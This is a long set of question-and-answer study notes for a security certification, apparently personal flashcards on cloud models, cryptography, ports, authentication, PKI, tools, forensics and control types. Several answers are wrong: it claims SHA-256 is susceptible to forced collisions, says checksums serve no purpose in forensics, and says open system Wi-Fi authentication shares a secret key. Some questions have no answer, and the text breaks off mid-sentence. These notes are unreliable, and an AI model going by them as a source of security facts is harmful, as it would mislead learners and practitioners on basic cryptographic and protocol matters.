What is a hash?
A one-way mathematical function: once the algorithm has run, there is no
feasible way to use the digest to recover the input that was used to generate
it. (It is not encryption, since there is no key and no way back.)

What is fake telemetry?

Fake telemetry is a deception technology used to make honeynets and honeypots
look real and appealing to would-be attackers.

What does platform as a service focus on?

Security and scalability

What is NFV?
Network function virtualization - an architecture that virtualizes network
services such as routers, firewalls and load balancers.

What is serverless architecture?

Serverless architecture is a way to develop and run applications and services
without owning and managing an infrastructure. Servers are still used, but they
are owned and managed "off-premises."

What is a transit gateway?

A transit gateway is a network connection that is used to interconnect virtual
private clouds (VPCs) and on-premises networks.

What is a hypervisor?
A hypervisor is the interface between a virtual machine and the host machine
hardware. Hypervisors are the layer that enables virtualization.
What are the 2 types of hypervisors in virtualization?
Type 1 - runs directly on the hardware (bare metal)

Type 2 - runs on top of a host operating system

You are planning to move some applications to the cloud, including your
organization's accounting application, which is highly customized and does not
scale well. Which cloud deployment model is best for this application?

Infrastructure as a Service is appropriate for highly customized, poorly
scaling solutions that require specific resources to run.

What is platform as a service suitable for?

Platform as a Service is suitable for standard resources in use by many other
applications.

What is software as a service suitable for?

Delivering highly scalable, on-demand applications without installing endpoint
software.

Which cloud deployment model has the fewest security controls?

Public

What needs to be the same between the development and live environments?

The development platform does need to use the same OS type and version.
Development hardware does not have to be scalable, and it probably does not
need to be as responsive for given transactions.

When is a staging environment typically used?

When an organization has multiple production environments

What is dead code?


Dead code is code that, while it may be executed, obtains results that are never
used elsewhere in the program.

What are advatages of data being checked for


compliance on clients?
efficiency

What are advatages of data being checked for


compliance on servers?
It's more secure because:

1) client can change anything after the check


2) data can be altered while in transit or at an intermediary proxy

What are advantages of newer programming


langueages Java, C#, python over C or C ++?
garbage collection - routine to clean up memory that has been allocated in a
program but is no longer needed is provided automatically and wee don't need
to allocate free memery explicitly.

What are SDKs?
Software developers use packaged sets of software programs and tools called
SDKs to create apps for specific vendor platforms.
What is OWASP?
The Open Web Application Security Project (OWASP) is a nonprofit foundation
dedicated to improving web-based application software security.

What is a compiler?
Compilers take computer programs written in one language and convert them to
a set of codes that can run on a specific set of hardware.

What is continuous monitoring?
Continuous monitoring is the term used to describe the technologies and
processes employed to enable rapid detection of compliance issues and security
risks.

What is continuous validation?
As code is changed in the DevOps process, the new code must be tested with
the existing codebase to ensure functionality and stability.

What is continuous integration?
Continually updating and improving the production codebase.

Rather than several large updates, with many integrated and potentially
cross-purpose update elements all squeezed into a single big package, a whole
series of smaller single-purpose integrations is run.

What is continuous delivery?
An automated release process that enables the delivery of updates when they
are complete, at any point in time, as opposed to a fixed release schedule.
What is continuous deployment?
Continuous deployment is continuous delivery on autopilot. It goes one step
further than continuous delivery in that the release is automatic.

What is the difference between elasticity and scalability?
Scalability is done in design and development, not after delivery.

Scalability is the characteristic of a software system to process higher
workloads on its current resources (scale up) or on additional resources
(scale out) without interruption.

What are the DevOps "continuous" tactics?
Continuous Monitoring
Continuous Validation
Continuous Integration
Continuous Delivery
Continuous Deployment

What kind of data will DLP solutions protect?
DLP solutions are designed to protect data in transit/motion, at rest, or in
processing from unauthorized use or exfiltration.

What is the difference between HOTP and TOTP?
HMAC-based One-Time Password (HOTP)
Time-based One-Time Password (TOTP)

HOTP passwords can remain valid and active for an unknown time period. TOTP
passwords are considered more secure because they are valid for short amounts
of time and change often.
How does push notification work?
Push notification authentication supports user authentication by pushing a
notification directly to an application on the user’s device. The user receives the
alert that an authentication attempt is taking place, and they can approve or
deny the access via the user interface on the application.

How can smart cards be used?
Many standard corporate-type laptops come with smart card readers installed,
and their use is integrated into the Windows user access system.

What is an acceptable FAR (false acceptance rate)?
0.01%

What is an acceptable FRR (false rejection rate)?
3%

What is a false positive with biometric authentication?
A false positive occurs when a biometric is scanned and allows access to
someone who is not authorized.

How many drives do you need for the different RAID standards?
RAID 0 and RAID 1 both require a two-drive minimum. Both RAID 3 and RAID 5
have a three-drive minimum. RAID 10 (also called 1+0) requires four drives at
minimum.
What is NIC teaming?
NIC teaming groups multiple NICs together to form a logical network device
called a bond. This provides for load balancing and fault tolerance.

What is a snapshot when talking about backups?
A snapshot is a copy of a virtual machine at a specific point in time.

What is the difference between tape and disk?
A disk allows you to directly access specific elements randomly, whereas a tape
system stores everything in one long structure, requiring you to physically move
the tape if you wish to access an element halfway through the storage.

What is NAS?
Network attached storage (NAS) is the use of a network connection to attach
external storage to a machine. NAS is a simple extension of data storage to an
external system, and typically these devices do not transfer data fast enough for
regular operations.

Difference between NAS and SAN?
NAS is a single storage device that serves files over the network to a machine.
It’s a simple form of external storage. A SAN, on the other hand, is a network of
multiple devices designed to manage large and complex sets of data in real time
at processor speed.

Difference between high availability and fault tolerance?
High availability refers to maintaining both data and services in an operational
state, even when a disrupting event occurs. Fault tolerance is a design objective
to achieve high availability should a fault occur.
Difference between scalability and elasticity?
Elasticity and scalability seem to be the same thing, but they are different.
Elasticity is related to dynamically scaling a system with workload (scaling out),
whereas scalability is a design element that enables a system both to scale up to
more capable hardware and to scale out to more instances.

What is diversity in cyber security?
Diversity is about having multiple different sets of controls to provide for risk
mitigation. Diversity should be practiced in all aspects and used to enhance
security.

What is SCADA?
Supervisory control and data acquisition (SCADA) systems can control
manufacturing plants, traffic lights, refineries, energy networks, water plants,
building automation and environmental controls, and a host of other systems.

Which industries need strict network segmentation?
Manufacturing
Energy also needs a unique physical security aspect

What can be categorized as specialized systems in IoT?
Medical devices, vehicles, aircraft and smart meters.

What is specific to medical systems?
Medical devices are manufactured under strict regulatory guidelines that are
designed for static systems that do not need patching, updating, or changes.
What standard do vehicle systems use?
CAN = controller area network

Are HVAC systems accessible from the Internet?
Yes

What OS is used in real-time operating systems?
They have a specifically crafted OS, as Windows and Linux are multithreaded,
which adds overhead.

What smart devices can be accessed via the Internet?
VoIP, HVAC, drones, multifunction printers

What is the advantage of narrowband radio communication?
It's slow, but the range is long - used for a large geographic area.

What communication technology carries only a single channel?
Baseband radio

What are the constraints of embedded systems?
Limitations on power, compute capacity, network throughput and bandwidth,
cryptography, and cost.
Which small devices are good for compute capabilities?
Microcontrollers
Field-programmable gate arrays = FPGAs
Application-specific integrated circuits = ASICs (used in modern self-driving
cars)

What is implied trust?
Implied trust, by definition, is trust that has not been specifically set up but yet
exists.

What are bollards used for?
Bollards are sturdy posts often made of concrete or galvanized or stainless steel.
They are used to protect entry ways and prevent unauthorized entry or vehicle
ramming attacks.

What is the advantage of motion recognition?
In the dark a camera might not see you, but motion recognition might detect
you based on your temperature signature.

What should be done to protect IP-based security cameras?
Place them on a separate network only accessible to security personnel.

How do robot sentries work?
They patrol the space, and if they notice an unauthorized person they send a
notice to personnel.
What is USB data blocker?
It will block 2 out of 4 conductors and only use those for power. This way data
can't be transmitted.

3 types of fire detection
Smoke detectors - can detect smoke
Temperature detectors - can produce false positives
Flame-activated detectors - most precise

What is used as physical detection?
Cameras, IR detection, motion detection, logs

What is EMI?
Electromagnetic interference - a disturbance that affects an electrical circuit.

What is pulping?
Pulping is a process by which paper fibers are suspended in a liquid and
recombined into new paper.

What is pulverizing?
Pulverizing is a physical process of destruction using excessive physical force to
break an item into unusable pieces. Pulverizers are used on items like hard disk
drives, destroying the platters in a manner that they cannot be reconstructed.

What is degaussing?
Magnetic storage devices (that is, magnetic tape and hard drives) can be
destroyed magnetically.
What does encryption provide?
Confidentiality

What does a digital signature provide?
Nonrepudiation

What is key stretching?
Key stretching is a mechanism that takes what would be weak keys and
“stretches” them to make the system more secure against brute-force attacks.

What is entropy?
Entropy is an important term in cryptography; it refers to the level of
randomness.

Where is a nonce used?
A nonce is a number used only once, and is similar to a salt, or an IV. However,
because it is only used once, if it is needed again, a different value is used.
Nonces provide random nondeterministic entropy into cryptographic functions
and are commonly used in stream ciphers to break stateful properties when the
key is reused.

What is authenticated encryption with associated data?
Authenticated encryption with associated data (AEAD) is a form of encryption
designed to provide both confidentiality and authenticity services. A wide range
of authenticated modes is available for developers, including GCM, OCB, and
EAX.
Common algorithms for symmetric encryption
AES, 3DES, RC4, IDEA

Common algorithms for asymmetric encryption
DSA, RSA, El Gamal, ECC, Diffie-Hellman

What is the most common standard for steganography with pictures?
LSB encoding - a method of encoding information into an image while altering
the actual visual image as little as possible.

What kind of cryptographic option is the best for low-latency operations?
Stream ciphers

What does a message authentication code (MAC) provide?
MACs, supported by hash functions, are an example of cryptographic services
supporting integrity.

What is gaining favor instead of AES?
ChaCha20, because it's faster.

Which algorithms in cryptography can suffer from weak keys?
DES, RC4, IDEA, Blowfish, GMAC
What algorithm standards in cryptography are weak?
MD5 = because of collisions
SHA-1, SHA-256 = susceptible to forced collisions
AES and ChaCha20 are efficient and provide better performance

If you need to perform operations such as addition on encrypted elements, what
type of encryption scheme would you use?
Homomorphic

To prevent the loss of a single message due to accidental decryption from
affecting other encrypted messages, which of the following properties is
needed?
Perfect forward secrecy

Given a large quantity of data in the form of a streaming video file, what is the
best type of encryption method to protect the content from unauthorized live
viewing?
Stream cipher

What is DNSSEC?
DNSSEC validates DNS data, thus providing integrity, but it does not provide
controls for availability or confidentiality.

What is S/MIME and what does it provide?
Remember that S/MIME is the standard for e-mail encryption. It provides
authentication, message integrity, and nonrepudiation in e-mails.
What is Support for Confidentiality?
Protecting data from unauthorized reading is the definition of confidentiality.

What is Support for Integrity?
Integrity can demonstrate that data has not been altered.

What is Support for Nonrepudiation?
Nonrepudiation is a property that deals with the ability to verify that a message
has been sent and received so that the sender (or receiver) cannot refute
sending (or receiving) the information.

Which port does LDAPS use?
LDAPS communication occurs over port TCP 636. LDAPS communication to a
global catalog server occurs over TCP 3269. When connecting to port 636 or
3269, SSL/TLS is negotiated before any LDAP traffic is exchanged.

What port does FTPS use?
TCP port 989 (data connection port) and port 990 (control connection port).

What ports are used for POP3 and IMAP?
Ports 110 for POP3 and 143 for IMAP.
Secure POP3 utilizes TCP port 995 and secure IMAP4 uses TCP port 993.

What ports are used by SMTP?
SMTP between servers is TCP port 25, but when clients are involved, it is TCP
port 587 or, if encrypted, TCP port 465.
What is heuristic scanning?
Heuristic scanning is a method of detecting potentially malicious or “virus-like”
behavior by examining what a program or section of code does. Anything that is
“suspicious” or potentially “malicious” is closely examined to determine whether
or not it is a threat to the system.

What is EDR?
Endpoint detection and response = includes antivirus, anti-malware, software
patching, firewall, and DLP solutions.

Difference between HIDS and HIPS?
Host-based intrusion prevention system - HIPS
Host-based intrusion detection system - HIDS

Remember that HIDS can only detect malicious activity and send alerts. HIPS, on
the other hand, can detect and prevent attacks.

Difference between static, manual and dynamic code analysis
Static analysis - usually performed by machine - automated (without the code
being executed)
Manual code review - done by the programmer or code author, who explains
each line to others
Dynamic code analysis - performed while the software is executed, either on the
target system or on an emulated system

What are SED, FDE and Opal?
Methods of implementing encryption on hard drives.
Fuzz testing works best in which testing environments?
Fuzz testing works well in known-environment, unknown-environment, and
partially-known-environment testing, as it can be performed without knowledge
of the specifics of the application under test.

You have a series of web servers that you wish to harden. Which is the best
solution for this case?
An allow list

Difference between a forward proxy and a reverse proxy
A forward proxy is Internet-facing and acts on behalf of the client. It protects the
client. A reverse proxy is internally facing and acts on behalf of the server, which
it protects.

How does the behavior model work?
It defines what should happen on the network and what is considered "normal"
or "acceptable" traffic. Behavior that does not fit into the "normal" activity
categories or patterns is considered suspicious or malicious.

How does the heuristic model work?
The heuristic model uses artificial intelligence (AI) to detect intrusions and
malicious traffic. This is typically implemented through algorithms that help an
IDS decide whether or not a traffic pattern is malicious.

How does anomaly-based detection work?
Anomaly detection identifies deviations from normal behavior.
What is network security monitoring?
Network security monitoring (NSM) is the process of collecting and analyzing
network data to detect unauthorized activity.

NSM is not a way to prevent intrusions, but when deployed inside a network, it
can detect where other defenses have failed.

What is the Extensible Authentication Protocol (EAP)?
EAP is a protocol for wireless networks that expands on the authentication
methods used by the Point-to-Point Protocol (PPP).

EAP can support multiple authentication mechanisms, including tokens, smart
cards, certificates, one-time passwords, and public key encryption
authentication.

What is PEAP?
Protected Extensible Authentication Protocol - encapsulates EAP with Transport
Layer Security (TLS)

Difference between PEAP and EAP-TLS
EAP-TLS for mutual authentication requires client and server certificates. PEAP
and EAP-TTLS eliminate the requirement to deploy or use client certificates.

What is EAP-FAST?
Offers a lightweight tunneling protocol to enable authentication.

What does PSK stand for?
Pre-shared key
What authentication is used in enterprise mode with wireless?
802.1X and a RADIUS server

What is open system authentication in wireless?
Open System authentication is not truly authentication; instead, it is merely a
sharing of a secret key based on the SSID.

What is a captive portal used for?
Captive portals are common in coffee shops, airports, hotels, and stores. The
user accepts the offered conditions, views an advertisement, provides an e-mail
address or other authentication requirement, and is granted access through the
portal. Used in wireless networks.

What is the difference between a heat map and a site survey?
A site survey is a process for determining Wi-Fi signal strengths; the heat map is
one of the outcomes and is part of the survey.

What is unique about EAP-TTLS?
It is easier to set up than other EAP schemes.

Which wireless protocol allows the passing of legacy authentication protocols
such as PAP, CHAP, and MS-CHAP?
EAP-TTLS
What are the advantage and disadvantage of cellular networks?
One of the strengths of cellular is that robust nationwide networks have been
deployed, making strong signals available virtually anywhere with reasonable
population density.

The corresponding weakness is that gaps in cellular service still exist in remote
areas.

What is the disadvantage of infrared?
It's slow compared to other wireless technologies.

What should mobile device management provide?
• Device locking with a strong password
• Encryption of data on the device
• Device locking automatically after a certain period of inactivity
• The capability to remotely lock the device if it is lost or stolen
• The capability to wipe the device automatically after a certain number of
failed login attempts
• The capability to remotely wipe the device if it is lost or stolen

What is the difference between geofencing and geolocation?
Geofencing is the use of the Global Positioning System (GPS) and/or radio
frequency identification (RFID) technology to create a virtual fence around a
particular location and detect when mobile devices cross the fence. This enables
devices to be recognized by others, based on location, and have actions taken.

Geolocation - track movement and location of the mobile device. Can be used to
assist in the recovery of lost devices.
Difference between tethering and hotspot?
Tethering involves the connection of a device to a mobile device to gain network
connectivity. A hotspot can be tethered if the actual device is mobile, but if the
device is fixed, it is not tethering.

What can zones be used for in the cloud?
Zones can be used for replication and provide load balancing as well as high
availability.

What is a VPC endpoint used for in the cloud?
A virtual private cloud endpoint provides a means to connect a VPC to other
resources without going out over the Internet. In other words, you don't need
additional VPN connection technologies or even an Internet gateway.

What is a CASB in relation to the cloud?
A cloud access security broker is a security policy enforcement point that is
placed between cloud service consumers and cloud service providers to manage
enterprise security policies as cloud-based resources are accessed.

What are SSH keys usually used for?
Primarily used for automated processes and services.

What is important when creating user IDs?
Having unique, nonshared user IDs for all users of a system is important when it
comes time to investigate access control issues.

What can be used together to manage password history?
• Enforce password history: Tells the system how many passwords to
remember and does not allow a user to reuse an old password in that list
• Maximum password age: Specifies the maximum number of days a password
may be used before it must be changed
• Minimum password age: Specifies the minimum number of days a password
must be used before it can be changed again

Where can you manage passwords in Windows?
Local group policies

What are access policies?
Ranging from password use, password length, expiration, and lockout to more
complex issues such as account expiration, recovery, and disablement, these
directives provide the guidance for security personnel to manage access
systems.

Which type of account comes with the greatest risk?
A shared account

What does CHAP rely on?
This mechanism relies on a shared secret between the two entities so that the
correct values can be calculated.

CHAP uses PPP, which supports which three functions?
Encapsulate datagrams across serial links
Establish, configure, and test links using LCP (Link Control Protocol)
Establish and configure different network protocols using NCP (Network Control
Protocol)
What is the disadvantage of PAP?
PAP is a cleartext authentication protocol and hence is subject to interception.
CHAP uses a challenge/response handshake protocol to secure the channel.

Which port is used for RADIUS?
UDP 1812 for authorization and 1813 for accounting functions

Which protocol and port are used by TACACS?
TCP 49

What is the difference between OAuth and OpenID?
OpenID is used for authentication, whereas OAuth is used for authorization.

How does Kerberos work?
Kerberos securely passes a symmetric key over an insecure network using the
Needham-Schroeder symmetric key protocol.

What is Kerberos built around?
Kerberos is built around the idea of a trusted third party, termed a key
distribution center (KDC), which consists of two logically separate parts: an
authentication server (AS) and a ticket-granting server (TGS).

What does the Kerberos server contain?
The Kerberos server contains user IDs and hashed passwords for all users that
will have authorizations to realm services.

Steps involved in Kerberos authentication?
1. The user presents credentials and requests a ticket from the Key Distribution
Server (KDS).
2. The KDS verifies credentials and issues a TGT (ticket-granting ticket).
3. The user presents the TGT and a request for service to the KDS.
4. The KDS verifies authorization and issues a client-to-server ticket.
5. The user presents a request and a client-to-server ticket to the desired
service.
6. If the client-to-server ticket is valid, service is granted to the client.

What is authentication?
Authentication deals with verifying the identity of a subject.

What is ABAC?
Attribute-based access control (ABAC) - a form of access control based on
attributes. These attributes can be in a wide variety of forms, such as user
attributes, resource or object attributes, and environmental attributes.

What is rule-based access control?
A series of rules is contained in the ACL, and the determination of whether to
grant access will be made based on these rules. An example of such a rule is
one that states that no employee may have access to the payroll file after hours
or on weekends.

Users are not able to change access control and rely on administrators.

What are some common information classifications in MAC?
Mandatory access control (MAC) - individuals can't change access control.
Common information classifications include High, Medium, Low, Confidential,
Private, and Public.
What is Discretionary access control (DAC)?
The controls are discretionary in the sense that a subject with a certain access
permission is capable of passing that permission (perhaps indirectly) on to any
other subject.

In systems that employ DACs, the owner of an object can decide which other
subjects can have access to the object and what specific access they can have.

Which 2 access control systems are terms originally used in the military?
DAC, MAC

What is the difference between DAC and MAC?
MAC is associated with multilevel security labels such as Top Secret and Secret,
whereas DAC uses ACLs.

When can conditional access be very useful?
Conditional access can be very useful when an entity has a wide array of
different systems with differing access needs.

Which type of file system is bad for security?
FAT32, but NTFS is good.

What permissions can be applied to a user or group to control folders and files
in Windows?
• Full Control: A user/group can change permissions on the folder/file, take
ownership if someone else owns the folder/file, delete subfolders and files, and
perform actions permitted by all other NTFS folder permissions.
• Modify: A user/group can view and modify files/folders and their properties,
can delete and add files/folders, and can delete properties from or add
properties to a file/folder.
• Read & Execute: A user/group can view the file/folder and can execute scripts
and executables, but they cannot make any changes (files/folders are read-only).
• List Folder Contents: A user/group can list only what is inside the folder
(applies to folders only).
• Read: A user/group can view the contents of the file/folder and the file/folder
properties.
• Write: A user/group can write to the file or folder.

What do file permissions consist of in UNIX operating systems?
• Owner permissions (read, write, and execute): The owner of the file
• Group permissions (read, write, and execute): The group to which the
owner of the file belongs
• World permissions (read, write, and execute): Anyone else who is not the
owner and does not belong to the group to which the owner of the file belongs

Which authentication scheme is the best for users who have not previously
established their identity?
Knowledge-based authentication

How can we know that a public key comes from the owner and not someone
else?
We use an RA. A registration authority (RA) verifies digital certificate requests
and
forwards them to a certificate authority (CA). The CA is a trusted organization
that validates and issues digital certificates.

What is Nonrepudiation?
Assurance that the sender of information is provided with proof of
delivery and the recipient is provided with proof of the sender's identity, so
neither can later deny having processed the information.
What is certificate revocation list used for?
The certificate revocation list is an essential item to ensure a certificate is still
valid. CAs post CRLs in publicly available directories to permit automated
checking of certificates against the list before certificate use by a client. A user
should never trust a certificate that has not been checked against the
appropriate CRL.

How can we check that a CRL wasn't edited by a fraudulent person?
The mechanism used to protect the integrity of a CRL is a digital signature.

The CA’s revocation service creates a digital signature for the CRL. To validate a
certificate, the user accesses the directory where the CRL is posted, downloads
the list, and verifies the CA’s digital signature to ensure that the proper authority
signed the list and to ensure that the list was not modified in an unauthorized
manner.

What are delta CRLs?
We push down the full CRL, and after that initial load, the following CRLs
pushed down to the users are delta CRLs that contain only the changes to the
original or base CRL.

How do we check if a certificate was revoked?
Certificate revocation checks are done either by examining the CRL or using
OCSP to see if a certificate has been revoked.

What is a certificate signing request (CSR)?
A certificate signing request (CSR) is the actual request to a CA containing a
public key and the requisite information needed to generate a certificate. The
CSR contains all the identifying information that is to be bound to the key by the
certificate-generation process.
What is FQDN?
Fully qualified domain name

What are wildcard certificates?
Wildcard certificates include an asterisk and period before the domain name.

*.example.com would be valid for one.example.com as well as two.example.com

What can be an end-entity certificate?
Email certificate
User certificate

What decides if we trust a self-signed (root) certificate?
What determines whether or not a system trusts a root certificate is whether or
not the root certificate is in the system’s store of trusted certificates.

What is a computer certificate used for?
For a computer connecting to the network.

Which certificate format is best if you need to transmit multiple certificates?
PEM encoding can carry multiple certificates, whereas DER can only carry a
single certificate.

Which certificate format is used by web servers?
The file extension .cer is an SSL certificate file format used by web servers.
How many certificates will Debbie check if she gets a message from Sam?

1) She will check Sam's certificate
2) She will check Leaf D certificate
3) She will check intermediate B certificate
4) She doesn't have to validate Root CA, because she already has trust with it

Debbie validates the certificate by verifying its digital signature


Where is the hierarchical model for CAs used?
Enterprise, but many companies cannot use this type of trust model because
different departments or offices require their own trust anchors.

This hierarchical model might not be possible when two or more companies need
to communicate with each other.

How does the peer-to-peer trust model for CAs work?
In a peer-to-peer trust model, one CA is not subordinate to another CA.
It doesn't scale well.

How does the hybrid model for CAs work?
A combination of the hierarchical model for internal use and peer-to-peer with
partners; a bridge CA can control the cross-certification procedures.
What is key escrow?
Key escrow is a system by which your private key is kept both by you and by a
third party.

What is CRL?
Certificate revocation list

Why is pinning more important on mobile devices?
It allows caching of a known good certificate when roaming to low-trust
networks.
What is tracert/traceroute used for?
The tracert and traceroute commands display the route a packet takes to a
destination, recording the number of hops along the way. These are excellent
tools to use to see where a packet may get hung up during transmission.

What does a nonauthoritative answer mean with a DNS lookup?
typically means the result is from a cache as opposed to a server that has an
authoritative

Difference between pathping, ping and traceroute?
Pathping will first display your path results as if you were using tracert or
traceroute. Pathping then calculates loss information.

In pathping the output includes a % (loss), and in tracert it does not.


What is netstat command used for?
The netstat command is useful for viewing all listening ports on a computer and
determining which connections are active.

4 different ARP messages
• ARP request “Who has this IP address?”
• ARP reply “I have that IP address; my MAC address is…”
• Reverse ARP (RARP) request “Who has this MAC address?”
• RARP reply “I have that MAC address; my IP address is…”
What is theHarvester used for?
Assists penetration testers.
A useful tool for exploring what is publicly available about your organization on
the Web.

What is DNSenum used for?
DNS enumeration can be used to collect information such as user names and IP
addresses of targeted systems.

What is Nessus used for?
Nessus is one of the leading vulnerability scanners in the marketplace. It comes
in a free version, with limited IP address capability, and fully functional
commercial versions.

How do you use chmod in Linux?
chmod <options> <permissions> <filename>

Octal notation for chmod
4 stands for “read,” 2 stands for “write,” 1 stands for “execute,” and 0 stands for
“no permission.”

What is PowerShell?
PowerShell is a powerful command-line scripting interface. PowerShell files use
the .ps1 file extension.

What is OpenSSL used for?
OpenSSL can perform the following tasks in either scripts or programs, offering
access to cryptographic functions without having to develop the code:
• Work with RSA and ECDSA keys
• Create certificate signing requests (CSRs)
• Verify CSRs
• Create certificates
• Generate self-signed certificates
• Convert between encoding formats (PEM, DER) and container formats
(PKCS12, PKCS7)
• Check certificate revocation status

What is a PCAP file?
Recorded traffic in the form of a packet capture.

Difference between dd and FTK Imager
dd is a Linux command-line utility used to convert and copy files, whereas FTK
Imager is a commercial program designed to capture an image of a hard drive.

What is data sanitization?
Data sanitization tools are tools used to destroy, purge, or otherwise identify for
destruction specific types of data on systems.

You need to analyze previously collected packet data on a network, including
editing some of the data. Which is the best tool to use?
TCPreplay
6 steps in incident response process

What is a tabletop exercise?


Walk through all the steps of a process, ensuring all elements are covered and
that the plan does not forget a key dataset or person.

This is typically a fairly high-level review

Should be repeated after major changes to systems

What is walkthrough exercise?


One party either explains or demonstrates the steps to perform a task while a
second person observes
What is MITRE ATT&CK framework?
The MITRE ATT&CK framework is a knowledgebase of various real-world
observations and attack techniques. It is often used by organizations for threat
modeling.

What is cyber kill chain?


Developed by Lockheed Martin, the Cyber Kill Chain is a framework used to
defend against the chain of events an attacker takes, from the beginning of an
attack to the end of an attack.

Difference between DRP and BCP?


Disaster recovery plan
Business continuity plan

The focus of the BCP is on continued operation of a business, albeit at a reduced
level or through different means during some period of time. The DRP is focused
specifically on recovering from a disaster. In many cases, both of these functions
happen at the same time, and hence they are frequently combined in small firms
and in many discussions. The DRP is part of the larger BCP process.

What is the difference between COOP and BCP?


Business continuity plan
Continuity of operation planning

The COOP is focused on continuing business operation, whereas the BCP is
focused on returning a business to functioning profitably, even if at a reduced
level or capacity. Government agencies, where service is essential and costs can
be dealt with later, focus on COOP, while many businesses have to focus on DRP
and BCP.

Cyber kill chain model parts


Reconnaissance
Weaponization
Delivery
Exploitation
Installation
Command and Control
Actions on Objectives

What does the security log provide?


Information regarding the success and failure of attempted logins as well as
security-related audit events.

When can a dump file be created?


By several utilities
By the OS when the system crashes

What is Session Initiation Protocol?


Text-based protocol used for signaling voice, video, and messaging applications
over IP.

SIP provides information for initiating, maintaining, and terminating real-time
sessions.

What is Syslog/Rsyslog/Syslog-ng used for?


Syslog, rsyslog, and syslog-ng all move data into log files on a log server. Rsyslog
and syslog-ng both extend the original syslog standard by adding capabilities
such as content filtering, log enrichment, and correlation of data elements into
higher-level events.

What is the difference between journalctl and syslog?
Journalctl is the command to examine logs on a server. Syslog (and the variants
rsyslog and syslog-ng) is used to move logs to a log server and sometimes to
manipulate the log file entries in transit.
What is the EXIF format?
The EXIF format is a standard that defines the formats of image, audio, and
metadata tags used by cameras, phones, and other digital recording devices.

Includes:
• The original filename
• Capture and last edited date and timestamps (with varying precision)
• GPS location coordinates (degrees of latitude and longitude)
• A small thumbnail of the original image
• The author’s name and copyright details
• Compass heading
• Device information, including manufacturer and model
• Capture information, including lens type, focal range, aperture, shutter speed,
and flash settings

Difference between NetFlow and sFlow?


Both NetFlow and sFlow collect packets from routers and switches. NetFlow data
can be useful in intrusion investigations. sFlow is used primarily for traffic
management, although it will help with DDoS attacks.

What is IPFIX?
The primary purpose of IPFIX is to provide a central monitoring station with
information about the state of the network.

It is based on the proprietary Cisco NetFlow standard.

What does correlation in a SIEM mean?


Correlation allows different events to be combined to provide greater specificity
in determining SIEM-based event detection. Correlation is a means for a SIEM
system to apply rules to combine data sources to fine-tune event detection.

What is the primary goal of DLP?


DLP can be classified as a technical control. Its primary goal is to detect
breaches and prevent data loss.
What are enclaves?
Enclave is the most commonly used term to describe sections of a network that
are logically isolated by segmentation at the network protocol level.

Difference between runbook and playbook in XSOAR?
A runbook typically focuses on technical aspects of computer systems or
networks. A playbook is more comprehensive and has more of a people/general
business focus.

You have been directed by upper management to block employees from accessing
Facebook from the corporate machines. Which would be the easiest way to
exercise this control?
Content filtering

What is chain of custody?


After evidence is collected, it must be properly controlled to prevent tampering.
The chain of custody accounts for all persons who handled or had access to the
evidence. More specifically, the chain of custody shows who obtained the
evidence, when and where it was obtained, where it was stored, and who had
control or possession of the evidence for the entire time since the evidence was
obtained

What is time offset?


time offset is the difference in time between the system clock and the actual
time.

What are tags used for?


Tags refer to a specific piece of hardware evidence
What is acquisition?
Acquisition refers to the collection of information that may be evidence in an
investigation.

Order of volatility
Order of how to collect data before it's lost

1. CPU, cache, and register contents (collect first)
2. Routing tables, ARP cache, process tables, kernel statistics
3. Live network connections and data flows
4. Memory (RAM)
5. Temporary file system/swap space
6. Data on hard disk
7. Remotely logged data
8. Data stored on archival media/backups (collect last)

What is a common data element needed later in the forensics process?
Accurate system time with respect to an accurate external time source

A record time offset is calculated by measuring system time with an external
clock such as a Network Time Protocol (NTP) server. The offset between system
time and true time can be lost if the system is powered down, so it is best to
collect it while the system is still running.
Disk

What is Swap/Pagefile?
The swap or pagefile is a structure on a system’s disk to provide temporary
storage for memory needs that exceed a system’s RAM capacity

What are artifacts?


Artifacts are the principal data element used in forensics. They are connected to
how the computer manages data to perform a task.
What is the disadvantage of checksums?
A disadvantage is that they miss larger numbers of errors as a second error can
cancel the effect of the first on a checksum. Thus, checksums serve no real
purpose in digital forensics. If two checksums are different, the incoming data
streams are different. If the checksums are the same, you might still have
different data streams.

What is provenance?
Provenance is a reference to the origin of data. In the case of digital forensics, it
is not enough to present a specific data element as “proof”; one must also show
where it came from.

How can we implement preservation in forensics?
The chain of custody is maintained until the case is completed and the materials
are released or destroyed.

When a forensic copy of the data is obtained, a hash is collected as well, to allow
for the verification of integrity.

What is sufficient evidence?


Sufficient evidence states the evidence must be convincing or measure up
without question

What is direct evidence?


Direct evidence is oral testimony that proves a specific fact (such as an
eyewitness’s statement).

What is knowledge of the fact evidence?


The knowledge of the facts is obtained through the five senses of the witness,
with no inferences or presumptions.
What is competent evidence?
Competent evidence states the evidence must be legally qualified and reliable

What is relevant evidence?


Relevant evidence states the evidence must be material to the case or have a
bearing on the matter at hand.

What is real evidence?


Real evidence is also known as associative or physical evidence and includes
tangible objects that prove or disprove a fact.

What is physical evidence?


Physical evidence links the suspect to the scene of a crime.

What is documentary evidence?


Evidence in the form of business records, printouts, manuals, and similar objects,
which make up much of the evidence relating to computer crimes, is
documentary evidence.

What are managerial controls?


Managerial controls are those that are based on overall risk management. These
security controls focus on the management of risk or the management of the
cybersecurity system. The use of cybersecurity audits is an example of a
managerial control
What is operational control?
An operational control is a policy or procedure used to limit security risk. These
security controls are primarily implemented and executed by people, as opposed
to systems. Instructions to guards are an example of an operational control

What is technical control?


A technical control uses some form of technology to address a physical security
issue. These security controls are primarily implemented and executed by the
information system through mechanisms contained in its hardware, software, or
firmware components. Biometrics is an example of a technical control.
What is the difference between operational and
technical control?
The main difference between operational and technical controls is that
operational controls are those that people initiate and follow, whereas technical
controls are typically automated and involve a machine to execute.

What is preventive control?


A preventative control is one that prevents specific actions from occurring, such
as a mantrap prevents tailgating. Preventative controls act before an event,
preventing it from advancing. A firewall is an example of a preventative control,
as it can block access to a specific resource.

What is detective control?


A detective control is one that facilitates the detection of a physical security
breach. Detective controls act during an event, alerting operators to specific
conditions. Alarms are common examples of detective controls. An IDS is an
example of an IT security alarm that detects intrusions.

What is corrective control?


A corrective control is used after an event, in an effort to minimize the extent of
damage. Load balancers and redundant systems act to reduce the risk from
system overloading and are thus corrective controls. Backups are a prime
example of a corrective control, as they can facilitate rapid resumption of
operations.
What is deterrent control?
A deterrent control acts to discourage the attacker by reducing the likelihood of
success from the perspective of the attacker. Any control that increases the cost
to an attacker is a deterrent control. An example would be laws and regulations
that increase punishment, increasing risk and costs for the attacker. Another
example would be the use of salts for password hashes to increase the cost of
building rainbow tables.

What is compensating control?


A compensating control is one that is used to meet a requirement when there is
